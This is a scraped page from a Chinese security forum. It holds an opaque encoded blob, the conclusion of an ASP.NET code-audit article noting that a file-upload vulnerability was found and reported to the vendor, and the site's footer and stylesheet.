3zfuWrZtyiH93ZcYdeev3dqYfHzo2DkaXz8/twJS4eF83pz3F5q3MOPn509k994Mvv4WtzZDRtxeq/GJXGitmhmAia1bt9b+mFatCAoKoqTEvkh7dHQ0QUFB7Nixo07n3rp1K6NGjXKOwZMqRSLHG6mioqKioqKioqKiomJDx/q49tpr8fHxwWQyOT8c/TZEEaqpat4ihGbBLatt0yKkNT36DCQ8ogt5m7LpPWAI/gGBBLdsRaeuMfj6+XH65EnWf7eCwwX7GDryTvz8A7wWU4wzZ2hpDq1SeDt9+hSnT59ym93jzenTp/gy7R2Gjbqb8I5dPLbx9fVj1C9/wzsvPsGcv4xnzPg/0D1mgHNB7ICKRakdCg/n886LM7ntvqnO9YxamkP5eNH/UbB/N1ff8AtiYge73dIn0pQ09zcAE/v27av1MWFhYfj5+bFz507AfjsaQEJCAomJiQCcOnWKzz77jI8++shrP45zOsbgidYkEhERERGRi0blQpCjiGEYVW+ZupzEXzsawO0x8UHNgrniygRnweX0yZP4+vnTNrwjJ8vL8PMPcOvjmO0Iu7dt4oxxhu0/rOGY7Qi/fGi6W4Hq5MlyfH39CAxqTnlZaZUijoNhGGR+toTmzVvi4+vLxuxVHtsdtx0l+5t07v7N/5D1xVKen3E/d/36z1hG3omfn79b2z0/beGTd1/ilw9NJyyis7NI1Co0jNvun4rtyEGWvfE8C1+Yzm+mzyWm/9V1u4giF0CAn/378dix2s3Gc9xadvz4cbc1jIKCglizZo1zjaKZM2cycuRIAK+FIsc5HWPwRE83ayJxxyFbkxjH5Rp1/RUVFRUVFRUVL1w8V4bh+allrv17a3Op27srj43Zq9i0NoOC/VY2r/+WlR+9xb+em+a8Nay09ATHCg/jHxjECQ+3i7Vo2YqefePoF38drdu2p1OXXlVmMB0vOkrzlmZamkMpPXHc41gMw2Dz+m8xh7bjpjET6NVvMP3ir6NLz1j+8+9/0Ta8E/3ir6Nf/HVEde9Ds+CWhLRqw+0PTGPev3O4LjHZrUBUWlJM+rsvkZv9NQ9MfYawiM6UlhQTGNScHn0GOtuZQ9tx/yN/4+Y7fsW671Y0xGUVaXCOWranp5p5cvfdd9OiRQuysrLYsmWLc3tpaSl5eXnO/D//+Q+nTp1yzjLyxHHO6urpHmcSVa7AK1euXLly5cqVK1euXHlD5efKMNzXJHLt27HPte3lVCwK79iF8I5dOHP6NFs3fk/vAUMIadWGEb94wNnmeNFRmgW3pKU5lKOHDtAmLMKtD5OPD4FBzZ2541H1rgoP59PSHEq7DpEU7LcS0rptlTbFxwrp2Dkac2g7APwqZjIdLzpKYPNgzK3bubX38/PH19cPk8nkNjOpvLSE3DXfEBAQxI23Peh2C9nBA3v48J153P/w39z68vX146YxEyg+Vsjp06eqLIYt0tgMA0wm8PHxqbFQlJKSQocOHcjKyqr2NrLa8qn4XqzurbHamUTKlStXrly5cuXKlStX3tB5fVTXt2FcvjOJ/PwDqtw+Vl5awj7rdkpL7I8xKjp6iJDWbWnfsavzyWB1tTV3NZHdehPaLoJd23I9XusWIa2dBSJX+T//RFiHzm6Puy8qPMSJ40Uez1VWVkJgYDMMDLbkfs/G7FVnP77/ijbtIjhZXua+PXsV361czuOTRpPxn39fll8L0rSVn7IXhlq2rH6dsZSUFGJ
<h2 blockindex=20>五、总结</h2>
<p blockindex=21>第一次写代码审计文章，各位大佬见谅，有什么地方错误的欢迎指出，在问题中进步。自己刚起步学<strong>ASP.NET</strong>审计不到一周，想着实战一下，误打误撞出了一个文件上传漏洞，该漏洞已上报厂商！！！</p></div></div>
 </div>
 <div class="post-opt mt-30">
 <ul class="list-inline text-muted">
 <li>
 <i class="fa fa-clock-o"></i>
 发表于 2024-08-13 09:53:07
 </li>
 <li>阅读 ( 892 )</li>
 <li>分类：<a href=https://forum.butian.net/articles/Web2 target=_blank rel="noopenner noreferrer">Web应用</a>
 </li>
 <li><a href=# class=report_btn data-source_type=vulnerabilities_article data-source_id=505 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
 </ul>
 </div>
 </div>
 <div class="text-center mt-30 mb-20">
 <button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=article data-source_id=505 data-support_num=1> 1 推荐</button>
 <button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=article data-source_id=505> 收藏</button>
 </div>
 </div>
 
 <div class="widget-answers mt-15">
 <h2 class="h4 post-title">0 条评论</h2>
 <div class=comment>
 </div>
 
 <div class="widget-comment-form row mb-20">
 <form class=col-md-12>
 <div class=form-group>
 <textarea id=comment-content name=content placeholder=写下你的评论 class=form-control value></textarea>
 </div>
 </form>
 <div class="col-md-12 text-right">
 
 <button type=submit data-token=sKaWQokrOTC3iA9XXzaH65D8iBGicq4jNmsDOLZX data-source_id=505 data-source_type=article class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
 </div>
 </div>
 
 <div class=text-center>
 
 </div>
 </div>
 </div>
 <div class="col-xs-12 col-md-3 side" style=display:none>
 
 
 </div>
 
 </div>
 </div>
</div>
<footer id=footer>
 <div class=container>
 <div class=text-center>
 <a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
 <a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
 <a href=https://forum.butian.net/sitemap>sitemap</a>
 </div>
 <div class="copyright mt-10">
 Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
 </div>
 </div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
 
</div>
 <div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
 
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-505 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
 
</div> 
 
 <div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
 
 </div>
 
 
 
 
 
 
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c